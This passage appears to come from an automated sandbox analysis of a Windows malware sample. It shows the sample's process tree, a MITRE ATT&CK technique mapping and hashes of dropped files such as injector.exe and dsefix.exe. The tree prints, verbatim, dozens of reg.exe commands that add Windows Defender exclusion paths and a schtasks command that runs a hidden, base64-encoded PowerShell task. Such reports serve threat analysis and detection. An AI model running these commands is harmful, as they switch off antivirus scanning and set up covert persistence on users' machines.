      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dhLLEIdhIALPnfpL" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1944
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\dhLLEIdhIALPnfpL\exDZSVhD\MxqYBUtwVlyMeczM.wsf"
    3⤵
    PID:2148
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\dhLLEIdhIALPnfpL\exDZSVhD\MxqYBUtwVlyMeczM.wsf"
    3⤵
    PID:2232
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DgNUdOtsSAUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1772
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DgNUdOtsSAUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:3040
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VhddhSPGXbTtC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2088
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VhddhSPGXbTtC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2820
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YPnijZjmU" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:860
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YPnijZjmU" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:936
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bRqNyyoRErtjvvoSYdR" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:932
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bRqNyyoRErtjvvoSYdR" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:3056
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZxhFKVMZkuU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1552
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZxhFKVMZkuU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2816
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\AZWNgyxeOHgkTeVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:472
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\AZWNgyxeOHgkTeVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1764
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1296
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2956
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QsOWyYwTYYzuxBvOU" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1356
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QsOWyYwTYYzuxBvOU" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1600
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dhLLEIdhIALPnfpL" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2696
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dhLLEIdhIALPnfpL" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2576
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DgNUdOtsSAUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:240
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DgNUdOtsSAUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2024
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VhddhSPGXbTtC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2076
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VhddhSPGXbTtC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1464
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YPnijZjmU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1120
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YPnijZjmU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2260
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bRqNyyoRErtjvvoSYdR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1216
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bRqNyyoRErtjvvoSYdR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2704
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZxhFKVMZkuU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:456
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZxhFKVMZkuU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:848
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\AZWNgyxeOHgkTeVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2784
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\AZWNgyxeOHgkTeVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2092
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2216
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:744
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QsOWyYwTYYzuxBvOU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:268
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QsOWyYwTYYzuxBvOU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1168
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dhLLEIdhIALPnfpL" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2436
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dhLLEIdhIALPnfpL" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2652
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gMOZXQQmu" /SC once /ST 02:47:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1312
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gMOZXQQmu"
    3⤵
    PID:2040

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2976

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1324

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1232

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
65d6ab2aaffdcc13198109ac54880f2a

SHA1
9057b283d112a7e7f8ac8270c352c318ae64de84

SHA256
488d69105ab2b046f322f794de3ff7bee5a84106757fa25160b135af1055c311

SHA512
0b9df8c219e88e9be2ffad19db8d7007697c1b8f178915d934bb16705ed3f9b1cfde93fe3d454d744d8bb8be0d105e71dc9708b8137ee56af70e1c8172bb1c0b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
1eddef17a3a0da5b0d315613913c55c2

SHA1
fb94741da180c277c9c9e3ad0498b08c8fcb139b

SHA256
11e07b1f27ae2eb17dffbd132bb39aaed0a65454e7c7e503ef63484daab2d408

SHA512
e756d94ca04f655dcb7b9e45c78fa7e3326b7bdd8e251e4eb3af7dbf95a24b0dbd85db6967717046423e14fe542f20d27a0879c5e066a4cf3d14acfc421faf5d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
c3c66fc4b72d8306869e4c9462784d89

SHA1
9f0bec58242d1048bde4b6313ecf9a9acbef7a29

SHA256
086ebe444d15966a274fec9592ee0c919efede53f6e15418768cb2891605dbe0

SHA512
7eb0f418b8afc80475f7cde04e6a4e662efdb640beda5ad65559cc42e44497e8dcfb83619490bdc5b50bacdcf34d0d674d4c8afc7168f4fe2624159003b918d6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
39994d0e90b283f3a0c1f1216448757d

SHA1
3664822c8166db78caebfff6f48e1b7eec98971e

SHA256
3c6486ab4299669e850bf2813ee62f6e5b23c0f3992135c4b778bb77d5adb7b8

SHA512
c1431c96266d119fb0111c6155d5c6bac5ef380b972d814045714c0e94c176759b7d6605eeca99638af6353d4c9cf80fb7b513270a763855f521e7df8978151f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS6845.tmp\Install.exe

Filesize
208KB

MD5
45352b3b83cd8a5ec24eddacd77cbcdf

SHA1
26d8a00ea9ea565aff96bf13a660d02d4b9d58bb

SHA256
e3773a7bb0ce756cf011b9051399cdc18495d6f440814c129b1fc8b1b7479e02

SHA512
30d823e68968d54cee4c6e959d3786c02d30da850075843ba2164b1fb628fa428c57e8699b7aee0d9639168672e76834876fa88649853837d4a52d688e1648f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS6845.tmp\Install.exe

Filesize
136KB

MD5
e9dcc7a1ce2b6dfa015a0cd5f3ad9af8

SHA1
6ffd931bea1b3045a08ec7ca43c2c9968650c75f

SHA256
5d7ace05d8437201f898b2bb7a296bd3454489299a77d4b412a123e9977889e9

SHA512
618f0fa8ac93e0d118117214b3dadb3e628785af348219055e2cdc06636fffee54145f1a1faa9f9ee9f0619c2ec1df5e495ceea84d7d997840b7d858a67c451e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS6FA4.tmp\Install.exe

Filesize
92KB

MD5
665508a3ee0c4d820323cada49feeab5

SHA1
8f5591e3f51812247a335f6244a09b6ad961dccb

SHA256
5b9665dd0b8014fb7ac28e062375bdac4148354b42f5b5f0e65b501145a07e3b

SHA512
242f7b0ad2e9450f839d24f0ed2e39d2a84a04f8d12510f31f2bdff48c24188abc795a8376a88d194d67b362ee4021c3237b1d57a8af7e32185069d292ce37df

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS6FA4.tmp\Install.exe

Filesize
168KB

MD5
b7e48917625e8c7c75b900c0f822f8d5

SHA1
e086904611c568a5326e279be66d9dca34c7749d

SHA256
6eae212bfaca39702b53e9915e7bc36a13aab27660601fcb3f977f6412ec5280

SHA512
7d4647bc63889756876d4df0272fbb7d9a33534e1f300cc7673b01bd2fadb3b7204e110e22bad2af7fc58217b3f0b25a1e0d0440aff334a4a6159c05ccbcf2eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab4E8F.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\QsOWyYwTYYzuxBvOU\gGqUKMWHcsuVFmW\HkvKokT.exe

Filesize
201KB

MD5
f53e2036e58fdea26b618bb7777c3b3b

SHA1
0c3b53204830e64d100a5cf84db92d20e56ecd76

SHA256
819ae6b0c180cabb484ccac561110ed0e7424c470806fd22589139a14015ef4b

SHA512
80cd5b38c222332b51f90e8e7193a9c112b1a6a1d02b4618aa5ee01ab3a5396f430f2de5eb48765805c32ce1c7f023b115adf639390d61fcaa9fb9ba18012c32

Download Submit
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

Filesize
150KB

MD5
a0163c2700f6663b1b1f92dd2122dc7e

SHA1
de5b21b38f6937816e943e86523bf164be928383

SHA256
3ce94bf856611cf9b6e63b501eb21696b6590faa6f368142e3b0025d9e64a4b2

SHA512
e94673f2befb9d2eb59c8f4f3ca89c3e8b71378728719c5d3091aebc139cdc42b660f9e5a293b54e9fc112cb29dc97f7c9865199126d3232912129500e68581c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

Filesize
217KB

MD5
e5cf0cd8dfc4a7d2b0eaa71ff7921bfd

SHA1
45ac51a8c7b4dba50ba1b36a311ae920ab0339b2

SHA256
2c32dbfa02e964b78457a6ed88042e3ec0b9e599ef0f288916ce2afd390c1174

SHA512
badc95cea18ff312d83f5189992e018328c42e585f974b07022eea9238d15652e2f74dfeca4938565a3833ea94139380e066138ed6c81b4a9c9992c8d0fa5136

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4EC1.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

Filesize
80KB

MD5
1098c1048eaa4d0bcb467df77a369d44

SHA1
eec92cac90cd493ec14c626aeb5d9f5c52f15943

SHA256
d82786cc16ad3c839c0dd836c70d95e8e1927b6c52977ea377aa730590b85049

SHA512
a9dd92960865daaee498b887dbe8a06705ff9104c2691e47111285252b4a83996edb9f1e759b3e3da6f89df1e7685622ecf8e1b23af86ba1ca2c7dd01c45be5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

Filesize
256KB

MD5
187127061a86166c3166149cc36d5b00

SHA1
649691802f5c36831b8f41f3afd55c29a073ff55

SHA256
4c264161c470c883aa9159ef44b965ffe5766c47139e42883af6d92b9c04cd26

SHA512
689119e402f59639a0098a55c750dc65301c91ea11cd97dda5ede5fc070c34d5b1ac85270f257578cf28cee860889fec6792c56951537d68a54c54e567c9fc82

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
48KB

MD5
5aca09204b136f5a37deb8ad4f56197e

SHA1
25645214ae25312fd484201b4d79ddd715087575

SHA256
c069b530720d6a04d7953d1e89390ed308a5179b2f6c1824c5f9480390252918

SHA512
131f5b801af4e2e0ba18b73f1ea19608c0dbac4098dda1260ae50f6d5b10630f1d9662703087c18caad4d80e32e41f52f55f213e7478732181cb06d799f62545

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-APUP6.tmp\Eg3CbaPfPvlHomvqcshBcOpb.tmp

Filesize
651KB

MD5
2a70cc162d4998e446a45c365ef70bcd

SHA1
8dabe2f6f96859b00412ea1b903092ab6d4afc5a

SHA256
29ed798e5620728d7e3617911724d0b35c227f96d012f4f9cfb8043fa517d838

SHA512
aff7868f64cbfc3793fa688b7491960c90b81311d3ea560c22d1686ca81646630fa9ab09d1fed0e93677107e0ecdd02a23fa58a2f5e440a370a34de11f00c165

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-APUP6.tmp\Eg3CbaPfPvlHomvqcshBcOpb.tmp

Filesize
115KB

MD5
80e35446beaf45a7a4423973a5ad76c3

SHA1
96abfde3ac43bf0ac489f8a072498d823c1b58ee

SHA256
96e96b070765743df4f900c75d8c55518f720b16ec20a09fd10299806558e419

SHA512
331218bc6de8a657aa0e530a49989aab91c2220826c64879e0962287bb0d7b7519c866b96442a58cad86d30dd67b0772ed1aa78d365c13b198de134d654e4c5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
59KB

MD5
122e6357402233b0d5421b0a254479ed

SHA1
8bc77d64ed55bf62c1c2316907ad52b4f3dfd807

SHA256
c371f5eddcf890e146f6fddea7078452d13aed8d8ebd12fa61bf357439f9fa11

SHA512
558c211585e52c4ad6c1522990c2615a44ac01adfdadf64ddd7079dbcb0a1e49d70775b6078ad7fe0f8267618a4ca54e767b196d7aa7a4ff237aa94b0221afd6

Download Submit
C:\Users\Admin\AppData\Local\Temp\osloader.exe

Filesize
67KB

MD5
a91e9b4fdb9f1a3c7ed106f27f7f48bc

SHA1
111ec251ed6518f9fe838301aa48e84c137fa40a

SHA256
449fcae09b7638077ab4eafd85cf45ee479543cafc8e3bbf293ca42e46ee7e72

SHA512
c28b0140bca319d2c7b403be65ad9a38f8a67f5a9a8a83f827b3089e1d8a00f3c02feac9f62e3b6547e245c97615ec000579c431dc2ff6a832a52ccd6391ebc8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UOVALPVG45OX0FDGTVLE.temp

Filesize
4KB

MD5
63148035fa9f9325fa1223be9391687f

SHA1
43582048b8bf2d92190e5f1ce15ef2c16fe26108

SHA256
5473cc35c0fd9f0dbae311da744121e74a318c14216659d97e7b4865a65f063e

SHA512
139a0e66086eba2627bd24492b8da8162a241e17b361205b82e75b37a49c7688a06b0a636e39a0fcfb952368f3b0fb42ee6dfd455cf0dc68c91dfe82210efb13

Download Submit
C:\Users\Admin\Pictures\4o87nTIv9I7pHUjJ8mV2Aynj.exe

Filesize
306KB

MD5
8bdf3d646f5896bfca0c00f4d3f427db

SHA1
ddbc1f2de8049167a18441b59cec8353ac14d321

SHA256
4aa8034d7926dc7e11621be9ba5e0e7170cdb4a46afc91083db726bb6647c56c

SHA512
bfd9d8a2afd67b1b4a998b5acd9d27275d5b39cb2e3130127cc0a0f8ad89f280a18c9335e66f56479905cb80d030113f81d1ea45acaf0d08455e3066cd253af8

Download Submit
C:\Users\Admin\Pictures\7yX7bPXAhwiqyCUH1kmdVYvP.exe

Filesize
105KB

MD5
888fc811612ed0b8c986ec8cae62a48e

SHA1
8d6127e487eeadac702b1bf8f3dfed1946e35abf

SHA256
a0ab752c49cdf05b4ce5bb113c2036caac74a36bca60aab3285d2f79541a52bd

SHA512
e3ece33a350282e3ea2fc52ca0af5e0fcbc5f5da18911f6d7ff26a21daaedee2123e0330c0c931e91c1e9c7bfb1c038c2078bf04f743f05e4bf6ad8e0d410e3d

Download Submit
C:\Users\Admin\Pictures\7yX7bPXAhwiqyCUH1kmdVYvP.exe

Filesize
41KB

MD5
2d765331f5283f04af5d237876f89683

SHA1
106a7abc659db911f13114983201b84ce3adefae

SHA256
a90908b8389d0167138875e97ceaf2e94c80b5866a60f42023f483ee15809e63

SHA512
07757b81dc423ce4695236fd672057cf7e3964fb577c21501be55132fd3aed0ca07d3f076c1059c1a9c0f94b432eeedf3219063ec8e4e104e6653344f46fcea7

Download Submit
C:\Users\Admin\Pictures\7yX7bPXAhwiqyCUH1kmdVYvP.exe

Filesize
93KB

MD5
c14032e64c98094662045ad7a776dd01

SHA1
47ee0a75e0aed98635247dcf858d9d951c2a9b65

SHA256
0e0e8865a03b6dbc0c8969fdfa62a9d7429e6f8984aab6437eb4207d225c1d66

SHA512
59716d4a818a57ec88caf999f4126ac6281eaec7fa32c8ac4b83e06b96eaa4417bcdcd08c9354e290b7033f950834e515003b8d92ddcc56c6011a4177fe8e757

Download Submit
C:\Users\Admin\Pictures\Eg3CbaPfPvlHomvqcshBcOpb.exe

Filesize
493KB

MD5
082e25f41cbd2dd06e3bbe3d1420ce33

SHA1
64e494fcb63d621626e9c523f5e052ad343622d4

SHA256
8c1a49ff5f02d4cd52c32d2c2d95b37116f44083dfe4f0898fe0be8dc5bf1996

SHA512
4bb975fceeae172fffe2c697d3ed02aead7b98997cab88f5c476221c8f9df0e93573ef4dbe4f040e9c38648279274ce33a4137645034cc183593a881bad7744d

Download Submit
C:\Users\Admin\Pictures\Eg3CbaPfPvlHomvqcshBcOpb.exe

Filesize
479KB

MD5
23baee6c9b5491274ac07e21ffe8df24

SHA1
5859f9baffcef35200c30ec6ffe69a7ae753c6ac

SHA256
df997244e99e7857645203c17257ede63eca393deab67497d1427bbed66cc941

SHA512
ed534558e13c6d7ecb230fccac12b804fe3e835fe5f79b149fe190b0497860539707d5525c461dea32e266ffbcce66dfb9be351487d8b8f8bdc1790cc51e0d48

Download Submit
C:\Users\Admin\Pictures\Eg3CbaPfPvlHomvqcshBcOpb.exe

Filesize
317KB

MD5
81fddce31d414ee423160d0cc4127468

SHA1
ffd5e5bec1396f745610fbdd97cd2d6cb81bb0df

SHA256
b2f955b77f381bd6c3285aa576787deeda365a09fa73a9e7e1461e071a3a51c6

SHA512
f11e2b285158909572e95b0934b2437af595dfe164adc8df6725e32856ae139ed4110aef9fd2c4dfa5d5c36159faffdd70fba87753962e88283afe96b2fb7a8c

Download Submit
C:\Users\Admin\Pictures\RzhzprthKDuW4ueMbFyqs795.exe

Filesize
229KB

MD5
209e5a6680a690aeb8f7bf10ec12cff6

SHA1
3aebb76b38813d0486af69ce4635f80b032bd5ce

SHA256
0f0947bf96ef4a2afaede7b6ad79c53de1e44e81ac07be2bc0f95bd6f4dd7430

SHA512
22fc5ce59990b9b0c5dea74a9e5226634ed4e685a9fff942aa700caf747e386b2898ef3547e1741247d48ad7d566a61ce779152eab2a104a64050f153bc15f8b

Download Submit
C:\Users\Admin\Pictures\RzhzprthKDuW4ueMbFyqs795.exe

Filesize
64KB

MD5
8186ea91b53c3a9558c5534a06de6527

SHA1
30a037295f25e0e529cabfc7b07ca153b37dee9a

SHA256
4baf5a13e67bbb29894547c5d1c1f5b3b110c1308cb91e737dde4741456535d6

SHA512
8267ff025ffc6a30ef639fb13165b7a8c6604e957d99a697f5d3edc73c5d816e30b72c815a4b89bbdf5b185f92d77c4c6107c4e6a184e4c4c7cc092ab7c45bc9

Download Submit
C:\Users\Admin\Pictures\nWiD3Z1XYXpGAzzD9VqNWAi0.exe

Filesize
848KB

MD5
d5ad467ec105d88cc513919f67db464a

SHA1
cbd2d3533c67c127c91fef103f85b7b36dcf2924

SHA256
1f95c41b9cc6f04620bff0a00a643b96726492c04acecdfbb3c3729bc2f28154

SHA512
028db8d930c1e8f82efa898f2e5d689ce03fdcb98d6915e4d408e67bbbfc5e3b89ccfd2b5d36ea291f4844e2f66d73e7d9f0a23c5211f98e35848b912838f4ba

Download Submit
C:\Users\Admin\Pictures\nWiD3Z1XYXpGAzzD9VqNWAi0.exe

Filesize
361KB

MD5
3e9b7775190c81438b9077dd5c76ec09

SHA1
3d894cf78918114cb5834c31516ef2c776eefa48

SHA256
aadb1fbb51134b65a488596dbd502b41bdbe7666a64c3b054737557f27c7269e

SHA512
